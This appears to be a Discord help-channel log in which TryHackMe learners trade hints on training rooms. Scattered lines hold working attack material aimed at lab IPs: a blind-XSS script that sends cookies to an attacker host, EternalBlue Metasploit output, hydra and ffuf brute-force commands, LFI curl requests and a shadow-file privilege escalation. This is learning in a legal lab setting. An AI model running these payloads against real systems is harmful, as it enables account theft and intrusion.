#room-hints

The what

I did

I tried everything

The hint says client side or server side

How is "front end" not the answer

1. front end - the way your browsers renders a website

No

I did

Both incorrectly

I did

Ofcourse it now says correct

I am trying this for the last 30 min

Someone changed something lol

Has to be

It was my second answer

Typed it 20 times

Even tried it with the "-"

Without

Capital letters

Nahhh im not crazy, someone fixed it

Pretty sure i didnt

But okay

hey guys i cant do this one https://tryhackme.com/room/tutorial

do we need a vpn?

cant understand i get this promb;lem

cant i do it on my machine and

?

but cant download vpn

it kept loading the ip

dont know why

ok wait virtiual box crash and cant open wait pls

now my kali not lettting me open it keep crashing

@burnt rivet

it not even here

hey i cant set up vpn in linux i tired soo much but done extrating it but cant do anything

so where to take it?

join vc ?

the open vpn?

cant understand wa ya i download this files

@burnt rivet this

ok ok

join vc i am 14 man i am dum i am new

i have open the link you send me

@burnt rivet srry if i am annoying or something

??

how to download it can you join vc? and help me get it

ya that wht i open openvpn gui

i copied this OpenVPN GUI and paste in the breos

I guess I'll have to include other extension types. Maybe search for files that have "backup" in their name as well.

I'm doing Task 4 of Network Services and I'm unable to download anything, or I don't know which folder the downloads are in. I use the syntax get [filename] and get getting file [filename] of size [size] as [filename] ([size] kilobytes/sec) (average [size] kilobytes/sec) What am I doing wrong. Also, when I used this syntax yesterday, I got the downloads on my desktop.

is that SMB thing?

and ithink is .help to get commands help

I really need help downloading files using smbclient.

did you login with smbclient

at what part you stuck ?

I'm in the smbclient interface, and I'm using get [filename] but nothing is working.

give me sec

try: more [filename]

and what file you try get

That just outputs the file contents, but I need to download because copying and pasting the content of the private-key file and trying to use it gives the error Load key "[key file location] " : invalid format

you try to downlaod ssh key. right ?

right

did you cd in .ssh

yes

put filename in ""

get "id_rsa"

ok

dont forget chmod it after download

is the download supposed to go to the Desktop of the linux machine? Because I still don't see anything

i think it goes in folder from where you are in. if you are in documents then goes there. if you are in music then will there

i have folder THM and when i get file it was there

i do boxes from that folder just to know where something goes when i get or download some content

I got it now. Thanks

cool

What file would have the usernames for smb users? I can't ssh into the user's smb account.

did you change ssh file chmod to 600 ?

Yes.

When I ssh, it just stalls

if so use: ssh -i id_rsa IP

Hold on...

username it hink is cactus

ssh -i id_rsa cactus@ipaddress

when you log with smbclient you shoud find the username fro clues

and in enumeration process also clues for username of user

Thanks again.

enumeration is inportant to read. read results from enum4linux that you run before

take you time to check all around whenever you get into some machine. write down clues

@placid smelt what problem you got with Blue?

Tried running the eternalblue exploit, but all I get is no session created. what I did was I edited the RHOSTS to machine's ip and LHOST to IP provided by the vpn and then ran the exploit, but it failed like more than 10 times already.

Can I have your target IP?

Alright, give me a minute or two.

Sorry, some work came up. Anyways, here's the target IP: 10.10.209.73.

First time.

Looks like I messed up somewhere, let me try again.

Ait nvm, looks like it had to do something with the payload given x64 one didn't work, so changed it to generic one.

Thanks for the help.

hello

i have a question

target ip 10.10.167.144

try: sudo nmap -Pn -sC -sV 10.10.209.73 -v

Hey, im currently doing the blind xss example, when it says make sure to specify netcat port, does that mean 9001 or?

see [] Started reverse TCP handler on 192.168.159.129:4444
[] 10.10.167.144:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.10.167.144:445 - Rex::ConnectionTimeout: The connection with (10.10.167.144:445) timed out.
[] 10.10.167.144:445 - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.167.144:445 - The target is not vulnerable.
[] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) >

the blue room in try hack me

your LHOST neeet to set to vpn profile

i am using the listener, how do i see what port im using for it? sorry im a bit confused lol

you set it you self

yes but does it matter what port

as i have to set to 9001

thats ok

just ports need to match

just smb port is 445 for eternalblue exploit

ight

mm still didnt work

</textarea><script>fetch('http://10.10.233.196?cookie=' + btoa(document.cookie) );</script>

thats the script i have running

using my machines ip as it says

and listening on 9001

w8. what room you doing

XSS

im on the practical example

all the other scripts worked, just seems to be my dumbass being unable to set it up right lol

try remove </textarea> part

but do i not need that to escape the original textarea? as shown by the previous scripts

yeah that broke it as the script didnt leave the textare

a

do it work or ? not sure then why is not

no it didnt, by removing the textarea the html sees it as a string rather than js, but even with the </textarea> it still isnt working

tbh, im probs just being dumb and not setting nc up right

no ideaatm then

ight ty for the help doe

the attackbox ip?

thats what i was using

okay...

so

what should the url i put into the script look like?

as at the moment its http://10.10.233.196

so i do add it onto the ip?

sorry this is the first time ive done this im super cofused lol

Heya all, is anyone else struggling on Wireshark: the basics question 2 from section 4? cf: https://tryhackme.com/room/wiresharkthebasics

#993868677600514130 there might already be answers in the chat there:)

also, have you read the full comment? you have to scroll down to the end

Ty for answering, this one?: https://tryhackme.com/forum/thread/62c3d7ab44dda20048a460b0

U talking about the last one from Khabibulix? It's me xD

nah, that's the form #993868677600514130 is a channel in this discord :)

have you done this?

Oh my bad, you rocks!

Nope 😉

hello, I am in the Windows Forensics 1 room, cannot find the answer to this question: What is the complete path from where the python 3.8.2 installer was run?

I'm looking at the AmCache hive and the Shimcache CSV file

actually nevermind I just found a youtube video about it

I can't find the answer to this question from the 'Firewalls' room:
You need to allow SNMP over SSH, snmpssh. Which port should be permitted?

Google aint helping :/

Burp Suite: Other Modules - Task 4, final flag
I know it's "key3", but I can't seem to get the correct answer... I'm taking the entire ssh key, applying an md5 hash right on top of that and then encoding the output into base64

I've tried not including the first and last line, but it didn't help...

The key should end with a new line

Room Sanbox Evasion: When i compile the .cpp file i get a (fatal error: urlmon.h: No such file or directory
#include <urlmon.h>). Command i used to compile it (g++ -Wall whoami.cpp -o whoamiExec)

It means you have not added urlmon to the libraries/dependencies for your visual studio project

This is covered in task 4 -> "Adding External Dependencies in Visual Studio" IIRC

The machine attached to the room should have it

@normal cliff ^

In Web Enumeration room, task 9, what do I fill in for cmnatics.playground?

probably nothing as that might be an example

you need to add the MACHINE_IP (which is the IP of the machine you've deployed in the room)

so

oh wiat

no

that is an example yes

but you need to add 10.10.129.98 wpscan.thm

the cmnatics.playground is an example(:

I could probably make that clearer tbh let me do that now

I need to enter something for cmnatics.playground. Don't I?

Otherwise -

wpscan.thm

10.10.129.98 wpscan.thm (assuming 10.10.129.98 is still the IP address)

that's it ((:

That is what I had already done.

Nothing shows when I hit "submit"

that's weird, i just submitted 767 and it has gone through

have you refereshed the page???

The TryHackMe page? No.
The FakeBank page? Yes.

also that is not the answer

if you can't enter answers and do not get the notifcation that says wrong answer refresh the tryhackme page

Oh

Thanks

So it tells me 767 is the wrong answer

which it is

Ok

It told me that's the balance when I entered the information, no?

the correct answer should be found by going to http://fakebank.com/ after doing the transfer

I did that

Let me try again

I tried again and yet it showed 767.68 as the answer

????

doubt that

can you send a screenshot of the page

weird

anything new on http://fakebank.com/bank-transfer/

No when I visit it again it just shows the default page

could you try and scroll up on the http://fakebank.com/ page to view things above the 767.68

well now the answer should be obvious... see the black/grey box

with the 🎉 in it

Oh

I kept thinking I had to enter the balance number

nope and that is why the answer was wrong

now you know the correct answer

Thank you for your help

no problem

I still can't figure this out. The way I can get rid of the error is by adding this to the hosts file

• But then I get no results.

It shows only 60% is done but I did all of the tasks. What's next?

Thanks. It worked.

Gave +1 Rep to @burnt rivet

Ok

It's the module "Hacking your first machine"

Yeah

Yeah

Oh

You should delete this, to avoid spoiling the flag for others.

Ok

Done

And this one, lol 🙂

Done and done

I don't want to demoralise you, I'm not a mod either.

Good job on getting it done.

I understand

Im on the follins msdt room, but question 4 is bugging me. I dont know what to do here

that room went private, so there's likely something broken with it 🤷‍♂️

Oh, its not private for me, i started 30 mins ago

yeh, once you join you have access

oh

On Network Services, task 6, my nmap scan of the target machine shows no ports open but it says that answer is wrong. What type of scan do I use?

About how long does it take to scan all 65535 ports?

here is another type of hint that basicly only applies to tryhackme ctfs: nmap has a timing flag that can speed up its scans( -T4 )

true just do not speed up real life scans as that will flood the networks with traffic that could cause problems

so you would probably go the other way around and slow down scans instead

well the same could be said about -T5 then maybe

and false negatives

same happened with -T4 for shadow too

depends on how much is going on on the network and a bit on luck

At my work, we are allowed to use -T3. T4 and T5 are a bit much

In Web Enumeration room, task 9, for the question "Enumerate the site, what is the name of the plugin that WPScan has found?", I ran wpscan --url http://wpscan.thm --enumerate p aggressive. WPScan found "||nextgen-gallery||" and "||nextcellent-gallery-nextgen-legacy||", but neither of those are the right answer. Should I run something else?

Thanks. I just hid the answers. Is that OK?

Gave +1 Rep to @burnt rivet

Is there a way to do a wpscan aggressive scan for users, or is that only possible for plugins?

Could someone plz let me know if the syntax for this is correct;
└──╼ $hydra -l Elliot -P fsocity.dic 10.10.124.243 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username" -t 30

Oh........

Could you tell me what is incorrect plz ?

Yes.....

With the dictionary from the site.......

I think so.....

I'm not sure to be honest.

No i am not.........

I'm not giving you signals.

So i should make sure the username is correct.
Is that what you're saying ?

Okay, Thanks.

So should i use zoom ?

https://github.com/krashman/Zoom

how do i upload images

u need to verify first

Can someone give me a clue for this question in the CommonAttacks room?;
Where you have the option, which should you use as a second authentication factor between SMS based TOTPs or Authenticator App based TOTPs (SMS or App)?

I have, Many times.

The answer is not there.

It really is not there.

It is not.

MFA is not the asnswer

The question is;
Where you have the option, which should you use as a second authentication factor between SMS based TOTPs or Authenticator App based TOTPs (SMS or App)?

That question is stupid

There are no steps set in stone for MFA.

There are other integers of MFA.

The question is stupid.

Project ?

You must be joking !

Thanks for the hint though.

Hey can someone give me a hint for The Marketplace room ?
I've got in using XSS and found the first flag.
I know I've to use SQLMap, but don't know where :p

Okay NVM got it
It was really difficult with SQLmap

How do I do that?

How do I get my Discord token?

Nvm. The instructions are a little confusing

So on task 6 of Network Services, I did an nmap scan and got the open port and protocol. The next question however is this "Based on the title returned to us, what do we think this port could be used for?" I have no idea what title the question is referring to? What do I do?

These instructions are not working for me. What am I missing?

Still not working

or hear shadow out lassi it is broken with its ability to send pings to both the attackbox and your own attack vms but the other commands work

¯_(ツ)_/¯

at least seen it before not work with the pings to the attackbox

dunno why

Upload Vulnerabilities - Task 5, Question 2...
Uploading a shell just refreshes the page and doesn't show it in the resources... any help?

hi I need a hint on SQLi room

It is telling me to try different things when searching for a table

this is on time-based blind sqli

I get the first two lines of code right

but I can't figure out which table to search for

could someone help me with this?

I need a hint of course

I think I am just overthinking it at the moment so I'm gonna take a few minutes to try to figure this out

I am having trouble finding the table to use

its not users or username

ok

so that makes sense

so I gotta reread this stuff when I have more energy

I'm gonna redo SQLi section from beginning when I have more energy

I think I just am tired right now so maybe not thinking clearly

For Network services , task 7, what type of protocol type is a "netcat reverse shell ?"

I don't understand the first question in Task 5 for Metasploit: Exploitation. How exactly do we know that the target is missing the MS17-010 patch based on the scan results?

You could use an nmap vuln script.

I started the machine and used the vuln script, this lists any vulns (on the ports I specified, you can do all) and it hit back with MS17-010 is Vulnerable, this can be useful in some CTF's.

It's 302 and it just shows the same page again

hi anyone can help?

state your problem don't just ask like this

https://dontasktoask.com/

Aka, say which room you're having trouble with, give the Link. Say what task it is, and which question. Then say what you've already tried and what you're having trouble with.

Hey thanks for this reply. I don't know if this was explained in the room or not, but I was going back and forth between using nmap inside msfconsole and in its own terminal, but both with default scripts. Another question, is there a way to search the nmap scripts database like you search in msfconsole?

Gave +1 Rep to @lucid junco

If you cd to /usr/share/nmap/scripts you'll be able to see all the scripts Nmap has, I'm sure there is a THM room that covers this (even if it's just partially)

hi i am doing the final task for Vulnversity to do privilege escalation i am kinda stuck on how to escalate the privilege for the compromised system from user to root so I can read into a file can anyone help, please

in order to how to become root i am kinda lost please if someone help

what have you tried so far??? suid binaries???? sudo -l??? other

it dosent work as i am in the system but kinda lost how to do privalage escaltion

it tell me to access the /bin/passwd folder but i dont have rights to go in

Thanks. I'll look more into some nmap documentation as well.

Gave +1 Rep to @lucid junco

Is there any room that teaches Prototype Pollution?

the hint indicates that there is an exploit related to that systemctl

so i suggest to look at ||GTFObins||

Hi, If I have questions regarding the Capstone Challenge in junior pentester path, should I ask here or in #junior-pentester-path ?

Ok, I'll try not to spoil for those who haven't done it yet.

So, I started the challenge, supposed to look for the flags file. I tried a find but didn't find anything, I suppose the files are in a location I don't have access to then.
Below are the steps I've already tried,

||I already tried:
-sudoers ==> I'm not one of them
-capabilities ==> didn't see anything useful
-cron ==> no cronjobs defined
-PATH ==> there are a few folders in PATH that I have writable access to, maybe for the next step.
-NFS ==> no shared folders

I looked in /etc/passwd and bingo there's a second user "missy", maybe she does have access to it.
etc/shadow is not accessible but I was able to get the content thanks to base64 having the sticky bit.
I start the simple http server on the target machine but am not able to download anything using my attacker machine =/||

I wanted to ||download passwd and shadow and use unshadow on them to get the passwords but can't access the http server. I will try crackstation too to see if I can get something from there.||

I feel so stupid right now >_<....

Thanks, just got the first flag. On to the next one

We learned that one of the email accounts is lazie. What is the password used to access the IMAP service on

protocols and services 2

maybe the vm not working

lol get the answer

try google it but no luck

in other rooms after few days the vm work and i get the answer after trying again the commands

so maybe i have the same problem again

hydra -l username -P wordlist.txt server service(this the command i use)

show no password match find

hydra -l username -P wordlist.txt server service

yes

server=10.10.139.131 imap

hydra -l lazie -vV -p wordlist.txt 10.10.139.131 imap

use even -vV

and without it

oh thanks

thank you very much lassi you help me

sometimes this little details make you break your head

i am doing the command the websites tells me to and it says "running the above command will find a single working username and password ..."

but it isnt giving me any password output when i d othe command

it told me to add the names i got from the previous command

oh 😄

im still not getting the password

you can use flags with cat

yea

Isn't there a new file "ilovelassi.txt" now 😄 ?

search in google find a website medium he show not only the answer but also the path to it

and explain why he use it

this how i done it when i don't see how to solve it

right

agree

i always try to find out why and how

to get the answer any idiot can

lol

but i know the answer lies somewhere in the command i have to change W1 with steve

but that didnt work for me, but i just saw in yt he did something like that

send the commend here not in photo

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200

i already know the password tho 😄 but i want to find it myself

to get the accomplishment feeling

i want to send you the web so you can see the way

👍

i am still a noob at this as you have noticed

it's ok ,i also kind new here 3month or 4 and try to become a PT guy so i start here then move to hack the box then do some bandit games

i am starting my 2nd year bachelor cybersecurity in 2 months 😄

but i don't know if i should do all the rooms here or only the PT path

i finish my cyber bootcamp on 14/6/22 still looking for job lol

even as soc

😮

so cheer up we all in the same boat lol

some day i make money in hacker101 lol

hi I am trying to do challenge 3 and I think I am close but I want a hint now that I have redone all of LFI

I feel I am very close but missing something

could someone help?

ya I know the cloudfront thing is weird hold on a sec

ok there's the request

I didn't try to do that wtf?

hold on

Looks like the firefox settings page got intercepted.

oh

ok hold on

I switched it to the THM challenge instead of Mozilla and it's still not working hold on

ok hold on let me start this again from scratch

ok so I'm gonna start it again and see how it works

lol I feel shitty I hope that mistake didn't make THM mad

ok I'm gonna start the lab again

ok

so the challenge is basically chaining everything together and the reason I wasn't able to figure it out was just because I wasn't using Burp

or not everything but multiple things

ok thanks for the advice

ok

but its basically chaining multiple components together

good idea

can someone give me a hint as to what I need to do? I am trying to do it without Burp

I changed request to post and

I also added an Admin cookie

I'm clearly missing something?

because in an earlier challenge I had to change request to POST to write to the file in order to get the result of that to show up in web page

and admin cookie to give myself administrator privileges because in a previous exercise you had to be admin to view page

what am I missing

maybe I'm not getting it conceptually?

inspect element

but it changed back to GET dynamically

hold on

i didn't think of that

yes I have used curl before

am I supposed to use FTP?

wait hold on

overthinking it

I typically would use curl to get web page source code

so are you saying to use curl with FTP?

that requires a password doesn't it?

ok hold on so no FTP I figured because doing curl to get web page wasn't working

ok so should I play with curl until I find it?

oh I see

ok thanks I will look this up

like I will research it

and think about it

so is this command on right track:

curl -d "user=Admin" -X POST http://10.10.245.232/challenges/index.php?file=../../../../etc/flag3

something like that?

ok I'm playing around with it now

something like:

curl -X POST http://10.10.245.232/challenges/chall3.php -H "application/x-www-form-urlencoded" -d "file=etc/flag3%00"

ok hold on

I'm trying to think through how to do this

I did it

hold on

thanks

ok

I'm gonna try the remote code execution challenge now

thank you so much

because the POST request from CURL wasn't filtered

only certain requests from within browser were filtered

ok I have to think about this

why did it work then and how did I figure it out? It makes no sense

aagh

ok. so the http request worked but then if http request wasn't blocked then why doesn't http request work within browser? because URL was filtered but other non-browser programs weren't?

that doesn't make sense to me

ok

so http requests weren't blocked but I had to feed the parameters into the URL bar? like I had to go into URL bar and specify parameters?

is that it?

I see

so HTTP POST requests weren't blocked

and I just couldn't figure out how to make an HTTP POST request that specifies parameters from within browser

I see

hold on I gotta get dinner

Ok back

So do I get it or no?

I’m assuming HTTP POST requests weren’t blocked and I just didn’t figure out how to make POST requests via browser?

I mean is that all it was?

Ok I understand that

I’m gonna try doing the RCE question

I’m gonna complete this challenge for sure

Then onto SQLi

and at this point aside from those two things I have completed intro to web hacking

Next thing just gotta learn next playlist

And then maybe learn burp?

This is gonna be good to expose myself to

After THM is HTB Academy a good next point?

I’m gonna complete all THM learning paths tho before I do that

Anyways for now onto RCE

I'm confused on this challenge

which file do I include?

hold on a sec let me try something

ok its not working

I am supposed to write script right? Which website do I upload the file to in order to link to it?

ok

but is that even doable in a TryHackMe VM?

do I need to do that to execute the command?

doesn't that cost money?

TryHackMe challenge requires me to pay?

I'm confused

is it $10 per month or no?

lol

ok but seriously, what free web server do they expect me to set up in VM?

oh I forgot about that

thanks for the reminder

ok

wouldn't this get you caught if you used your real computer's IP address?

like what attacker in their right mind would actually do this?

would they set up an anonymous web server or something?

like I would assume no one would want to actually do this attack in their right mind

lol what?

ok true

but I don't get your point

so anyone doing any of these things would be caught immediately

so what's the point in doing them?

lol

yes I get that

but RCE would get you caught even if you did use VPN or Tor networking right?

I mean you are specifying your IP address

ok so you would have to have a separate web server set up right?

like wouldn't doing it on your local machine be suicide?

oh right

I've used file hosting platforms so that sounds easy

that answers my question

lol I'm a law abiding citizen but if anyone is actually running a local server on their laptop and using that for RCE they are a fucktard because that's not how its supposed to be done I suppose

but does anyone ever try to do that?

I imagine that cops would be at their house on day 1

if someone made that mistake

lol

ya I know totally

in all seriousness tho, I'm not gonna do that

lol

because I will get hacked if I stay legal and if I break the law, which I think is what your assuming I would do, I would go to prison immediately

so ya I'm not gonna do that

ok

ok so no one would do that to begin with

they would just upload file to fileupload.com or something

I see

ok makes sense

btw I'm not doing this room right

I tried typing IP address of server in URL bar and and ; and echoing shell_exec("sh hostname_exec")

and I tried similar things in input bar

ok

I am gonna keep going then

thank you

I think that I need to take a break from this stuff for now so I'm gonna do something and come back to it

thank you tho